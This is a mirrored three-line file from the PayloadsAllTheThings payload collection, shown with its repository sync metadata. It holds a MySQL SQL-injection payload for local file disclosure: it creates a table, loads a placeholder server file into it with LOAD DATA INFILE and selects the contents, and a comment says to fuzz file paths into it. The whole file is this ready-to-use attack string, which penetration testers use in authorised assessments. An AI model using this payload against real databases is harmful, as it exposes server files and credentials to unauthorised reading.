mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
4 lines
210 B
Text
4 lines
210 B
Text
|
# mysql local file disclosure through sqli
|
||
|
# fuzz interesting absolute filepath/filename into <filepath>
|
||
|
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|